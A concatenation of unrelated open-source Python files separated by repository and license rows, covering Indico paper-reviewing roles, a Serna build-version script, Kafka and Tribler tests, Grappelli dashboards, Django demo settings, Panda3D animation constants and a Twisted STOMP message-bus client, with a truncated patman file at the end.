from indico.core.logger import Logger
from indico.core.roles import ManagementRole
from indico.modules.events.features.base import EventFeature
from indico.modules.events.models.events import Event, EventType
from indico.util.i18n import _
from indico.web.flask.util import url_for
from indico.web.menu import SideMenuItem
# Module-level logger for the papers (Call for Papers) module.
logger = Logger.get('events.papers')
@signals.menu.items.connect_via('event-management-sidemenu')
def _extend_event_management_menu(sender, event, **kwargs):
    """Add a 'Call for Papers' entry to the event management side menu."""
    allowed = (event.cfp.is_manager(session.user) and
               PapersFeature.is_allowed_for_event(event))
    if not allowed:
        return
    return SideMenuItem('papers', _('Call for Papers'),
                        url_for('papers.management', event),
                        section='organization')
@signals.event_management.management_url.connect
def _get_event_management_url(event, **kwargs):
    """Return the CFP management URL for paper managers (None otherwise)."""
    if not event.cfp.is_manager(session.user):
        return
    return url_for('papers.management', event)
@signals.event.get_feature_definitions.connect
def _get_feature_definitions(sender, **kwargs):
    # Register the 'papers' feature with the event feature framework.
    return PapersFeature
@signals.acl.get_management_roles.connect_via(Event)
def _get_management_roles(sender, **kwargs):
    """Expose the paper-reviewing ACL roles available on events."""
    for role in (PaperManagerRole, PaperJudgeRole,
                 PaperContentReviewerRole, PaperLayoutReviewerRole):
        yield role
class PapersFeature(EventFeature):
    """Event feature toggling the Call for Papers workflow."""
    name = 'papers'
    friendly_name = _('Call for Papers')
    description = _('Gives event managers the opportunity to open a "Call for Papers" and use the paper '
                    'reviewing workflow.')
    @classmethod
    def is_allowed_for_event(cls, event):
        # Only full conferences can open a call for papers.
        return event.type_ == EventType.conference
class PaperManagerRole(ManagementRole):
    """ACL role granting full paper-reviewing management rights."""
    name = 'paper_manager'
    friendly_name = _('Paper Manager')
    description = _('Grants management rights for paper reviewing on an event.')
class PaperJudgeRole(ManagementRole):
    """ACL role granting judgment rights on assigned papers."""
    name = 'paper_judge'
    friendly_name = _('Judge')
    description = _('Grants paper judgment rights for assigned papers.')
class PaperContentReviewerRole(ManagementRole):
    """ACL role granting content-review rights on assigned papers."""
    name = 'paper_content_reviewer'
    friendly_name = _('Content reviewer')
    description = _('Grants content reviewing rights for assigned papers.')
class PaperLayoutReviewerRole(ManagementRole):
    """ACL role granting layout-review rights on assigned papers."""
    name = 'paper_layout_reviewer'
    friendly_name = _('Layout reviewer')
    description = _('Grants layout reviewing rights for assigned papers.')
@signals.event.sidemenu.connect
def _extend_event_menu(sender, **kwargs):
    """Add CFP entries (and their visibility rules) to the event display menu."""
    # Imported lazily to avoid a circular import at module load time.
    from indico.modules.events.layout.util import MenuEntryData
    def _judging_area_visible(event):
        # Visible only to logged-in users with judging access.
        if not session.user or not event.has_feature('papers'):
            return False
        return event.cfp.can_access_judging_area(session.user)
    def _reviewing_area_visible(event):
        # Visible only to logged-in users with reviewing access.
        if not session.user or not event.has_feature('papers'):
            return False
        return event.cfp.can_access_reviewing_area(session.user)
    def _call_for_papers_visible(event):
        # Visible to CFP staff and to users who may submit papers.
        from indico.modules.events.papers.util import has_contributions_with_user_paper_submission_rights
        if not session.user or not event.has_feature('papers'):
            return False
        return (has_contributions_with_user_paper_submission_rights(event, session.user) or
                event.cfp.is_staff(session.user))
    yield MenuEntryData(title=_("Call for Papers"), name='call_for_papers',
                        endpoint='papers.call_for_papers', position=8,
                        visible=_call_for_papers_visible)
    yield MenuEntryData(title=_("Reviewing Area"), name='paper_reviewing_area', parent='call_for_papers',
                        endpoint='papers.reviewing_area', position=0, visible=_reviewing_area_visible)
    yield MenuEntryData(title=_("Judging Area"), name='paper_judging_area', parent='call_for_papers',
                        endpoint='papers.papers_list', position=1, visible=_judging_area_visible)
| gpl-3.0 |
pantonov/serna-free | tools/buildsys/buildver.py | 5 | 4025 | ##
## Copyright(c) 2009 Syntext, Inc. All Rights Reserved.
## Contact: info@syntext.com, http://www.syntext.com
##
## This file is part of Syntext Serna XML Editor.
##
## COMMERCIAL USAGE
## Licensees holding valid Syntext Serna commercial licenses may use this file
## in accordance with the Syntext Serna Commercial License Agreement provided
## with the software, or, alternatively, in accorance with the terms contained
## in a written agreement between you and Syntext, Inc.
##
## GNU GENERAL PUBLIC LICENSE USAGE
## Alternatively, this file may be used under the terms of the GNU General
## Public License versions 2.0 or 3.0 as published by the Free Software
## Foundation and appearing in the file LICENSE.GPL included in the packaging
## of this file. In addition, as a special exception, Syntext, Inc. gives you
## certain additional rights, which are described in the Syntext, Inc. GPL
## Exception for Syntext Serna Free Edition, included in the file
## GPL_EXCEPTION.txt in this package.
##
## You should have received a copy of appropriate licenses along with this
## package. If not, see <http://www.syntext.com/legal/>. If you are unsure
## which license is appropriate for your use, please contact the sales
## department at sales@syntext.com.
##
## This file is provided AS IS with NO WARRANTY OF ANY KIND, INCLUDING THE
## WARRANTY OF DESIGN, MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
##
import sys, time, os
# Python 2 script: validate argument count and unpack positional arguments.
if len(sys.argv) < 7:
    print >> sys.stderr,"\nUsage: buildver.py <gen_file> <ver_file>",
    print >> sys.stderr, "<module_name> <product_name> <major> <minor> <patch>\n"
    sys.exit(1)
# sys.argv[1:8] expects exactly seven values; fewer were rejected above.
buildver, ver_file, module_name, product_name, major, minor, patch = sys.argv[1:8]
class BuildVer:
    """Generate buildver.cpp/buildver.hpp holding version/build metadata.

    Version numbers default to the command-line values and are overridden
    by the first non-comment line of ver_file ('major.minor.patch').
    """
    def __init__(self, buildver, ver_file, module_name, product_name, major, minor, patch):
        self.buildver_ = buildver
        self.module_name_ = module_name
        self.product_name_ = product_name
        self.major_, self.minor_, self.patch_ = major, minor, patch
        # Output files share the generated file's basename (.hpp/.cpp).
        self.basename_, ext = os.path.splitext(self.buildver_)
        self.text_patch_ = '0'
        try:
            for line in open(ver_file):
                line = line.strip()
                if line[0] != '#':
                    self.major_, self.minor_, self.text_patch_ = line.split('.', 2)
                    break
        except Exception:
            # Missing or malformed ver_file: keep the command-line version.
            # (Was a bare 'except:', which would also swallow SystemExit
            # and KeyboardInterrupt.)
            pass
        if "darwin" == sys.platform:
            # Hide the symbols on Mac OS X builds.
            self.extern_ = '__attribute__((visibility("hidden"))) extern'
        else:
            self.extern_ = 'extern'
        self.builddate_ = time.strftime("%Y%m%d")
    def dump_hpp(self):
        """Write buildver.hpp, or exit(1) if any field is empty."""
        if self.module_name_ and self.product_name_ and self.major_ and self.minor_ and self.patch_:
            fobj = open(self.basename_ + ".hpp", "w+")
            # NOTE(review): the generated '#endif // RC_INVOKED"' line below
            # carries a stray trailing quote (harmless inside a C++ comment).
            print >> fobj, """#ifndef _VERSION_H\n#define _VERSION_H\n
# define MODULE_NAME \t\t"%(module_name_)s"
# define MODULE_PRODUCT_NAME \t"%(product_name_)s"\n
# define VERSION_MAJOR\t\t%(major_)s
# define VERSION_MINOR\t\t%(minor_)s
# define VERSION_PATCH\t\t%(patch_)s
# define BUILD_DATE\t\t%(builddate_)s
#ifndef RC_INVOKED\n
%(extern_)s const char buildver[];
%(extern_)s const char builddate[];\n
%(extern_)s const char modulename[];
%(extern_)s const char productname[];\n
#endif // RC_INVOKED"
#endif // _VERSION_H""" % self.__dict__
        else:
            sys.exit(1)
    def dump_cpp(self):
        """Write buildver.cpp, or exit(1) if any field is empty."""
        if self.module_name_ and self.product_name_ and self.major_ and self.minor_ and self.patch_:
            fobj = open(self.basename_ + ".cpp", "w+")
            print >> fobj, """#include "buildver.hpp"\n
const char buildver[] = "%(major_)s.%(minor_)s.%(patch_)s";
const char builddate[] = "%(builddate_)s";
const char modulename[] = "%(module_name_)s";
const char productname[] = "%(product_name_)s";\n""" % self.__dict__
        else:
            sys.exit(1)
try:
    bv = BuildVer(buildver, ver_file, module_name, product_name, major, minor, patch)
    bv.dump_cpp()
    bv.dump_hpp()
except Exception:
    # Catch only real errors.  The previous bare 'except:' also intercepted
    # the deliberate sys.exit(1) (SystemExit) raised inside dump_cpp/dump_hpp,
    # silently turning the intended exit status 1 into 2.
    sys.exit(2)
| gpl-3.0 |
richhaase/kafka | tests/kafkatest/tests/client/consumer_rolling_upgrade_test.py | 23 | 4200 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ducktape.mark.resource import cluster
from kafkatest.tests.verifiable_consumer_test import VerifiableConsumerTest
from kafkatest.services.kafka import TopicPartition
class ConsumerRollingUpgradeTest(VerifiableConsumerTest):
    """System test: rolling upgrade of the consumer partition assignment strategy."""
    TOPIC = "test_topic"
    NUM_PARTITIONS = 4
    # Fully-qualified class names of the two assignors under test.
    RANGE = "org.apache.kafka.clients.consumer.RangeAssignor"
    ROUND_ROBIN = "org.apache.kafka.clients.consumer.RoundRobinAssignor"
    def __init__(self, test_context):
        super(ConsumerRollingUpgradeTest, self).__init__(test_context, num_consumers=2, num_producers=0,
                                                         num_zk=1, num_brokers=1, topics={
            self.TOPIC : { 'partitions': self.NUM_PARTITIONS, 'replication-factor': 1 }
        })
    def _verify_range_assignment(self, consumer):
        # range assignment should give us two partition sets: (0, 1) and (2, 3)
        assignment = set([frozenset(partitions) for partitions in consumer.current_assignment().values()])
        assert assignment == set([
            frozenset([TopicPartition(self.TOPIC, 0), TopicPartition(self.TOPIC, 1)]),
            frozenset([TopicPartition(self.TOPIC, 2), TopicPartition(self.TOPIC, 3)])]), \
            "Mismatched assignment: %s" % assignment
    def _verify_roundrobin_assignment(self, consumer):
        # round-robin alternates partitions, giving (0, 2) and (1, 3)
        assignment = set([frozenset(x) for x in consumer.current_assignment().values()])
        assert assignment == set([
            frozenset([TopicPartition(self.TOPIC, 0), TopicPartition(self.TOPIC, 2)]),
            frozenset([TopicPartition(self.TOPIC, 1), TopicPartition(self.TOPIC, 3)])]), \
            "Mismatched assignment: %s" % assignment
    @cluster(num_nodes=4)
    def rolling_update_test(self):
        """
        Verify rolling updates of partition assignment strategies works correctly. In this
        test, we use a rolling restart to change the group's assignment strategy from "range"
        to "roundrobin." We verify after every restart that all members are still in the group
        and that the correct assignment strategy was used.
        """
        # initialize the consumer using range assignment
        consumer = self.setup_consumer(self.TOPIC, assignment_strategy=self.RANGE)
        consumer.start()
        self.await_all_members(consumer)
        self._verify_range_assignment(consumer)
        # change consumer configuration to prefer round-robin assignment, but still support range assignment
        consumer.assignment_strategy = self.ROUND_ROBIN + "," + self.RANGE
        # restart one of the nodes and verify that we are still using range assignment
        consumer.stop_node(consumer.nodes[0])
        consumer.start_node(consumer.nodes[0])
        self.await_all_members(consumer)
        self._verify_range_assignment(consumer)
        # now restart the other node and verify that we have switched to round-robin
        consumer.stop_node(consumer.nodes[1])
        consumer.start_node(consumer.nodes[1])
        self.await_all_members(consumer)
        self._verify_roundrobin_assignment(consumer)
        # if we want, we can now drop support for range assignment
        consumer.assignment_strategy = self.ROUND_ROBIN
        for node in consumer.nodes:
            consumer.stop_node(node)
            consumer.start_node(node)
            self.await_all_members(consumer)
            self._verify_roundrobin_assignment(consumer)
| apache-2.0 |
MaxVanDeursen/tribler | Tribler/Test/Core/Upgrade/test_torrent_upgrade_64_65.py | 1 | 1920 | import os
import shutil
from twisted.internet.defer import inlineCallbacks
from Tribler.Core.Upgrade.torrent_upgrade65 import TorrentMigrator65
from Tribler.Core.leveldbstore import LevelDbStore
from Tribler.Test.Core.Upgrade.test_torrent_upgrade_63_64 import AbstractTorrentUpgrade63to64
from Tribler.dispersy.util import blocking_call_on_reactor_thread
class AbstractTorrentUpgrade64to65(AbstractTorrentUpgrade63to64):
    """Shared fixture for the 6.4 -> 6.5 torrent-store migration tests."""

    @blocking_call_on_reactor_thread
    @inlineCallbacks
    def setUp(self):
        """Create a LevelDB-backed torrent store and the 6.5 migrator."""
        yield super(AbstractTorrentUpgrade64to65, self).setUp()

        store_dir = os.path.join(self.session_base_dir, "leveldbstore")
        os.mkdir(store_dir)
        self.torrent_store = LevelDbStore(store_dir)
        self.torrent_upgrader = TorrentMigrator65(
            self.torrent_collecting_dir, self.session_base_dir,
            self.torrent_store)

    def tearDown(self, annotate=True):
        # NOTE(review): 'annotate' is accepted but not forwarded to the parent
        # tearDown -- confirm whether the parent expects it.
        self.torrent_store.close()
        super(AbstractTorrentUpgrade64to65, self).tearDown()

    def assert_upgrade_successful(self):
        # A successful run must have processed and migrated at least one
        # torrent file, and the store must contain entries.
        self.assertGreater(self.torrent_upgrader.torrent_files_migrated, 0)
        self.assertGreater(self.torrent_upgrader.processed_file_count, 0)
        self.assertGreater(len(self.torrent_store), 0)
class TestTorrentUpgrade63to64(AbstractTorrentUpgrade64to65):
    # NOTE(review): despite its name this class inherits
    # AbstractTorrentUpgrade64to65 and therefore exercises the 6.4 -> 6.5
    # migration -- confirm whether the name is intentional before renaming,
    # since test discovery keys on the class name.

    def test_upgrade_success(self):
        # A normal migration run reports migrated files and a populated store.
        self.torrent_upgrader._migrate_torrent_collecting_dir()
        self.assert_upgrade_successful()

    def test_torrent_collecting_dir_no_dir(self):
        # If the collecting path is a plain file instead of a directory,
        # nothing should be processed or migrated.
        shutil.rmtree(self.torrent_collecting_dir)
        self.write_data_to_file(self.torrent_collecting_dir)
        self.torrent_upgrader._migrate_torrent_collecting_dir()
        self.assertEqual(self.torrent_upgrader.torrent_files_migrated, 0)
        self.assertEqual(self.torrent_upgrader.processed_file_count, 0)
        self.assertEqual(len(self.torrent_store), 0)
| lgpl-3.0 |
cselis86/edx-platform | common/test/acceptance/pages/lms/matlab_problem.py | 179 | 1024 | """
Matlab Problem Page.
"""
from bok_choy.page_object import PageObject
class MatlabProblemPage(PageObject):
    """
    Page object for a Matlab problem in the LMS courseware.
    """

    url = None

    def is_browser_on_page(self):
        # The ungraded-result area is unique to matlab problems.
        return self.q(css='.ungraded-matlab-result').present

    @property
    def problem_name(self):
        """
        The display name of the current problem.
        """
        return self.q(css='.problem-header').text[0]

    def set_response(self, response_str):
        """
        Type a response into the CodeMirror editor via javascript.
        """
        script = "$('.CodeMirror')[0].CodeMirror.setValue('{}');".format(response_str)
        self.browser.execute_script(script)

    def click_run_code(self):
        """
        Submit the current response by clicking the run-code button.
        """
        self.q(css='input.save').click()
        self.wait_for_ajax()

    def get_grader_msg(self, class_name):
        """
        Return the text content of the elements matching ``class_name``.
        """
        self.wait_for_ajax()
        return self.q(css=class_name).text
| agpl-3.0 |
dahool/vertaal | grappelli/dashboard/dashboards.py | 6 | 6370 | # coding: utf-8
"""
Module where grappelli dashboard classes are defined.
"""
# DJANGO IMPORTS
from django.utils.translation import ugettext_lazy as _
from django.core.urlresolvers import reverse
from django import forms
# GRAPPELLI IMPORTS
from grappelli.dashboard import modules
from grappelli.dashboard.utils import get_admin_site_name
class Dashboard(object):
    """
    Base class for dashboards.
    The Dashboard class is a simple python list that has three additional
    properties:

    ``title``
        The dashboard title, by default, it is displayed above the dashboard
        in a ``h2`` tag. Default value: 'Dashboard'.

    ``template``
        The template to use to render the dashboard.
        Default value: 'admin_tools/dashboard/dashboard.html'

    ``columns``
        An integer that represents the number of columns for the dashboard.
        Default value: 2.

    If you want to customize the look of your dashboard and it's modules, you
    can declare css stylesheets and/or javascript files to include when
    rendering the dashboard (these files should be placed in your
    media path), for example::

        from admin_tools.dashboard import Dashboard

        class MyDashboard(Dashboard):
            class Media:
                css = {
                    'all': (
                        'css/mydashboard.css',
                        'css/mystyles.css',
                    ),
                }
                js = (
                    'js/mydashboard.js',
                    'js/myscript.js',
                )

    Here's an example of a custom dashboard::

        from django.core.urlresolvers import reverse
        from django.utils.translation import ugettext_lazy as _
        from admin_tools.dashboard import modules, Dashboard

        class MyDashboard(Dashboard):

            # we want a 3 columns layout
            columns = 3

            def __init__(self, **kwargs):
                super(MyDashboard, self).__init__(**kwargs)

                # append an app list module for "Applications"
                self.children.append(modules.AppList(
                    title=_('Applications'),
                    exclude=('django.contrib.*',),
                ))

                # append an app list module for "Administration"
                self.children.append(modules.AppList(
                    title=_('Administration'),
                    models=('django.contrib.*',),
                ))

                # append a recent actions module
                self.children.append(modules.RecentActions(
                    title=_('Recent Actions'),
                    limit=5
                ))
    """
    # Using Django's Media meta class (Python 2 style __metaclass__); it
    # merges any ``Media`` inner class declared on subclasses.
    __metaclass__ = forms.MediaDefiningClass

    def _media(self):
        # No media by default; subclasses contribute via their Media class.
        return forms.Media()
    media = property(_media)

    # Defaults; each may be overridden on a subclass or via __init__ kwargs.
    title = _('Dashboard')
    template = 'grappelli/dashboard/dashboard.html'
    columns = 2
    children = None

    def __init__(self, **kwargs):
        # Only keyword arguments that match an existing class attribute are
        # applied; unknown keys are silently ignored.
        for key in kwargs:
            if hasattr(self.__class__, key):
                setattr(self, key, kwargs[key])
        # Ensure 'children' is an instance-level list so appends never mutate
        # state shared through the class attribute.
        self.children = self.children or []

    def init_with_context(self, context):
        """
        Sometimes you may need to access context or request variables to build
        your dashboard, this is what the ``init_with_context()`` method is for.
        This method is called just before the display with a
        ``django.template.RequestContext`` as unique argument, so you can
        access to all context variables and to the ``django.http.HttpRequest``.
        """
        pass

    def get_id(self):
        """
        Internal method used to distinguish different dashboards in js code.
        """
        return 'grp-dashboard'
class DefaultIndexDashboard(Dashboard):
    """
    The default dashboard displayed on the admin index page.

    To change the default dashboard you'll have to type the following from the
    commandline in your project root directory::

        python manage.py customdashboard

    And then set the ``GRAPPELLI_INDEX_DASHBOARD`` settings variable to
    point to your custom index dashboard class.
    """

    def init_with_context(self, context):
        site_name = get_admin_site_name(context)
        add_module = self.children.append

        # Quick links to common admin actions.
        add_module(modules.LinkList(
            _('Quick links'),
            collapsible=False,
            children=[
                [_('Return to site'), '/'],
                [_('Change password'),
                 reverse('%s:password_change' % site_name)],
                [_('Log out'), reverse('%s:logout' % site_name)],
            ]
        ))

        # All installed applications except the Django contrib ones.
        add_module(modules.AppList(
            _('Applications'),
            exclude=('django.contrib.*',),
        ))

        # The Django contrib applications only.
        add_module(modules.AppList(
            _('Administration'),
            models=('django.contrib.*',),
        ))

        # The five most recent admin log entries.
        add_module(modules.RecentActions(_('Recent Actions'), 5))

        # Latest entries from the official Django weblog feed.
        add_module(modules.Feed(
            _('Latest Django News'),
            feed_url='http://www.djangoproject.com/rss/weblog/',
            limit=5
        ))

        # External support resources.
        add_module(modules.LinkList(
            _('Support'),
            children=[
                {
                    'title': _('Django documentation'),
                    'url': 'http://docs.djangoproject.com/',
                    'external': True,
                },
                {
                    'title': _('Django "django-users" mailing list'),
                    'url': 'http://groups.google.com/group/django-users',
                    'external': True,
                },
                {
                    'title': _('Django irc channel'),
                    'url': 'irc://irc.freenode.net/django',
                    'external': True,
                },
            ]
        ))
| gpl-3.0 |
gotlium/django-geoip-redis | demo/demo/settings.py | 1 | 5146 | # Django settings for demo project.
DEBUG = True
TEMPLATE_DEBUG = DEBUG

ADMINS = (
    ('root', 'root@localhost'),
)

MANAGERS = ADMINS

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': 'db.sqlite',
        'USER': '',
        'PASSWORD': '',
        'HOST': '',
        'PORT': '',
    }
}

# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.4/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []

# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'

# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'

SITE_ID = 1

# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True

# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True

# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True

# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''

# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''

# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''

# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'

# Additional locations of static files
STATICFILES_DIRS = (
    # Put strings here, like "/home/html/static" or "C:/www/django/static".
    # Always use forward slashes, even on Windows.
    # Don't forget to use absolute paths, not relative paths.
)

# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
    # 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)

# Make this unique, and don't share it with anybody.
# NOTE(review): a hard-coded SECRET_KEY is acceptable only for this demo
# project -- never reuse a committed key in production.
SECRET_KEY = 'rl+c(vz0tc(&svm*va9=+$q_$c%i#qb0p@tkc-p37y_$b@aj6e'

# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
    'django.template.loaders.filesystem.Loader',
    'django.template.loaders.app_directories.Loader',
    # 'django.template.loaders.eggs.Loader',
)

MIDDLEWARE_CLASSES = (
    'django.middleware.common.CommonMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    # django-geoip-redis middleware under demonstration in this project.
    'geoip.middleware.GeoMiddleware',
    # Uncomment the next line for simple clickjacking protection:
    # 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)

ROOT_URLCONF = 'demo.urls'

# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'demo.wsgi.application'

TEMPLATE_DIRS = (
    # Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
    # Always use forward slashes, even on Windows.
    # Don't forget to use absolute paths, not relative paths.
)

INSTALLED_APPS = (
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.sites',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # grappelli is listed before django.contrib.admin so its templates take
    # precedence over the stock admin templates.
    'grappelli',
    'django.contrib.admin',
    'django_extensions',
    # 'djcelery',
    'south',
    'geoip',
)

# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'filters': {
        'require_debug_false': {
            '()': 'django.utils.log.RequireDebugFalse'
        }
    },
    'handlers': {
        'mail_admins': {
            'level': 'ERROR',
            'filters': ['require_debug_false'],
            'class': 'django.utils.log.AdminEmailHandler'
        }
    },
    'loggers': {
        'django.request': {
            'handlers': ['mail_admins'],
            'level': 'ERROR',
            'propagate': True,
        },
    }
}

GRAPPELLI_ADMIN_TITLE = 'Demo'

# django-geoip-redis settings.
# NOTE(review): the meaning of GEO_REDIS_TYPE='name' is inferred from the
# setting name only -- confirm against the geoip app's documentation.
GEO_BACKEND = 'redis'
GEO_REDIS_TYPE = 'name'
GEO_REDIS_DB = 4

# Allow per-machine overrides without editing this file.
try:
    from .local_settings import *
except ImportError:
    pass
| gpl-3.0 |
Wilee999/panda3d | direct/src/leveleditor/AnimGlobals.py | 8 | 1326 | """
This contains data structure and constants related with animation handling.
"""
# index for keyFramesInfo list structure
# data structure: {[nodeUID, propertyName] : [frameNum,
#                                             value,
#                                             [inSlopeX, inSlopeY],
#                                             [outSlopeX, outSlopeY]]}
UID = 0
PROP_NAME = 1

FRAME = 0
VALUE = 1
INSLOPE = 2
OUTSLOPE = 3

# index for curveAnimation list structure
# data structure: {[nodeUID, curveUID] : [nodeUID,
#                                         curveUID,
#                                         time]}
# (the duplicate NODE/CURVE definitions that used to follow were redundant
# re-assignments of identical values and have been removed)
NODE = 0
CURVE = 1
TIME = 2

# index for animation curve generation information list structure(self.X, self.Y, self.Z in GraphEditorUI)
# data structure: [key,
#                  i ,
#                  [[keyFrameX, keyFrameY], keyFrame_select],
#                  [[inTangentX, inTangentY], inTangent_select],
#                  [[outTangentX, outTangentY], outTangent_select],
#                  [inSlopeX, inSlopeY],
#                  [outSlopeX, outSlopeY]]
KEY = 0
I = 1
KEYFRAME = 2
IN_TANGENT = 3
OUT_TANGENT = 4
IN_SLOPE = 5
OUT_SLOPE = 6

# index into the [local_value, select] pairs above
LOCAL_VALUE = 0
SELECT = 1

# index for coordinate
X = 0
Y = 1
Z = 2
| bsd-3-clause |
ymow/nowin_core | nowin_core/message_bus/stomp.py | 2 | 4795 | import logging
from twisted.internet import reactor
from twisted.internet.defer import inlineCallbacks
from twisted.internet.defer import maybeDeferred
from twisted.internet.defer import returnValue
from nowin_core.patterns import observer
from nowin_core.stomp import async_client
class STOMPMessageBus(object):
    """Message bus backed by an asynchronous (Twisted) STOMP client.

    Provides connect/send/subscribe/unsubscribe/close operations and three
    observer subjects that fire on authentication, connection loss and
    connection failure.
    """

    def __init__(
        self,
        host,
        user,
        password=None,
        logger=None
    ):
        """
        @param host: (address, port) tuple of the STOMP server
        @param user: login name for the STOMP session
        @param password: optional password
        @param logger: logger to use; defaults to this module's logger
        """
        self.logger = logger
        if self.logger is None:
            self.logger = logging.getLogger(__name__)
        self.host = host
        self.user = user
        self.password = password
        self.client = None
        # called when we are authorized
        self.auth_event = observer.Subject()
        # called when connection lost
        self.conn_lost_event = observer.Subject()
        # called when connection to host failed
        self.conn_failed_event = observer.Subject()
        #: is this connection closed
        self.closed = False
        #: subscription handles on the client's events; released in close()
        self._sub_ids = []
        self.logger.info('Create message bus, host=%s, user=%s',
                         self.host, self.user)

    def handleConnLost(self):
        """Called when connection lost; closes and notifies observers.
        """
        self.close()
        self.conn_lost_event()

    def handleAuth(self):
        """Called when we are authorized; notifies observers.
        """
        self.auth_event()

    @inlineCallbacks
    def connect(self):
        """Connect to peer and log in.

        NOTE(review): on failure this returns (via returnValue) the exception
        instead of raising it -- callers appear to depend on this, so the
        behavior is kept.
        """
        from twisted.internet.protocol import ClientCreator
        self.closed = False
        if self.client is not None:
            self.logger.warn('Already connected')
            returnValue(None)
        self.logger.debug('Logging in as %s ...', self.user)
        creator = ClientCreator(reactor, async_client.STOMPClient)
        try:
            self.logger.info('Connecting to %s', self.host)
            self.client = yield creator.connectTCP(*self.host)
        except Exception as e:
            self.logger.info('Failed to connect to %s', self.host)
            self.client = None
            self.conn_failed_event()
            returnValue(e)
        # close() may have been called while the TCP connect was in flight
        if self.closed:
            self.logger.warn('Abort connection')
            self.client.close()
            self.client = None
            return
        self._sub_ids.append(
            self.client.conn_lost_event.subscribe(self.handleConnLost))
        self._sub_ids.append(
            self.client.auth_event.subscribe(self.handleAuth))
        try:
            yield self.client.login(self.user, self.password)
        except Exception as e:
            self.logger.info('Failed to login as %s', self.user)
            self.logger.exception(e)
            self.conn_failed_event()
            returnValue(e)
        self.logger.info('Login as %s', self.user)

    @inlineCallbacks
    def send(self, dest, data):
        """Send data to message bus
        """
        if self.client is None:
            self.logger.warn('Not connected, ignore send cmd to %s', dest)
            returnValue(None)
        dest = str(dest)
        self.logger.debug('Sending %s bytes to %s ...', len(data), dest)
        yield maybeDeferred(self.client.send, dest, data)
        self.logger.info('Sent %s bytes to %s', len(data), dest)

    @inlineCallbacks
    def subscribe(self, dest, callback):
        """Subscribe to specific destination, the callback will be called when
        the there is message in the destination
        """
        if self.client is None:
            self.logger.warn('Not connected, ignore subscribe cmd to %s', dest)
            returnValue(None)
        dest = str(dest)
        self.logger.debug('Subscribing to %s ...', dest)
        yield maybeDeferred(self.client.subscribe, dest, callback)
        self.logger.info('Subscribed to %s', dest)

    @inlineCallbacks
    def unsubscribe(self, dest):
        """Unsubscribe from message bus
        """
        if self.client is None:
            self.logger.warn('Not connected, ignore Unsubscribe cmd to %s',
                             dest)
            returnValue(None)
        self.logger.debug('Unsubscribe... from queue %s', dest)
        # Bug fix: this previously called client.subscribe() again, so the
        # subscription was never actually removed.
        yield maybeDeferred(self.client.unsubscribe, dest)
        self.logger.info('Unsubscribed from queue %s', dest)

    def close(self):
        """Close connection to message bus
        """
        if self.client is None or self.closed:
            self.logger.warn('Already closed')
            return
        self.logger.debug('Closing message bus ...')
        # release our subscriptions on the client's events before dropping it
        for sid in self._sub_ids:
            sid.unsubscribe()
        self._sub_ids = []
        self.client.close()
        self.client = None
        self.closed = True
        self.logger.info('Closed message bus')
| mit |
falstaff84/u-boot | tools/patman/checkpatch.py | 31 | 6898 | # Copyright (c) 2011 The Chromium OS Authors.
#
# See file CREDITS for list of people who contributed to this
# project.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
#
import collections
import command
import gitutil
import os
import re
import sys
import terminal
def FindCheckPatch():
